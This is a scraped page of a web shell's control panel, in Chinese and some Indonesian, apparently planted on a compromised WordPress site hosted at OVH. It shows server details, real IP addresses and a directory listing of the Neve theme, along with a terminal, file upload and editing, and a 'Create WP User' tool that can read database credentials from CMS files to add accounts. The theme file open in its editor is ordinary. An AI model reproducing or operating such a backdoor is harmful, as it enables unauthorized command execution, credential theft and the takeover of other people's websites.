Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
infrops.pl
/
wp-content
/
themes
/
neve
/
views
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
archive-post.php
844.00 B
-rw-r--r--
2024-04-02 19:03
page-header.php
1.34 KB
-rw-r--r--
2024-04-02 19:03
sidebar.php
915.00 B
-rw-r--r--
2024-04-02 19:03
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
page-header.php
<?php /** * Page header view template. * * @package Neve */ $title_style = apply_filters( 'neve_title_alignment_style', '', 'normal' ); if ( ! empty( $title_style ) ) { $title_style = 'style="' . $title_style . '"'; } $hide_title = get_theme_mod( 'neve_page_hide_title', false ); $current_page = get_queried_object(); $pid = $current_page instanceof WP_Post ? $current_page->ID : get_the_ID(); $specific_hide_title = get_post_meta( $pid, 'neve_meta_disable_title', true ); if ( (int) get_option( 'page_for_posts' ) === $pid || is_archive() ) { $hide_title = get_theme_mod( 'neve_archive_hide_title', false ); } if ( ! empty( $specific_hide_title ) ) { $hide_title = $specific_hide_title === 'on'; } if ( ! $hide_title ) { ?> <div class="nv-page-title-wrap <?php echo esc_attr( $args['wrap-class'] ); ?>" <?php echo wp_kses_post( $title_style ); ?>> <div class="nv-page-title <?php echo esc_attr( $args['class'] ); ?>"> <?php do_action( 'neve_before_page_title' ); ?> <h1><?php echo wp_kses_post( is_search() ? $args['string'] : html_entity_decode( $args['string'] ) ); ?></h1> <?php if ( ! empty( $args['category_description'] ) ) { ?> <?php echo wp_kses_post( $args['category_description'] ); ?> <?php } ?> <?php do_action( 'neve_after_page_title' ); ?> </div><!--.nv-page-title--> </div> <!--.nv-page-title-wrap--> <?php }
关闭
保存